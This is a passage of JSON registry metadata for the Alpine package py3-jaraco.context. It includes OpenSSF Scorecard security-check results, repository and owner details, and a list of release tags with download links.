maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.639Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.23","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":"bribbers@disroot.org","url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2364,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2026-03-04T05:48:41.759Z","updated_at":"2026-03-04T05:48:41.759Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.23","url":"https://pkgs.alpinelinux.org/packages?branch=v3.23","ecosystem":"alpine","default":false,"packages_count":27576,"maintainers_count":428,"namespaces_count":2,"keywords_count":189,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1042},"icon_url":"https://github.com/alpinelinux.png","created_at":"2026-01-24T14:35:50.739Z","updated_at":"2026-08-24T05:05:17.086Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/namespaces"}},{"id":6098970,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2022-07-16T10:13:25.000Z","latest_release_published_at":"2022-07-16T10:13:25.000Z","latest_release_number":"4.1.2-r0","last_synced_at":"2026-03-21T14:35:16.848Z","created_at":"2023-01-31T20:42:10.961Z","updated_at":"2026-08-06T19:26:18.650Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.17/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/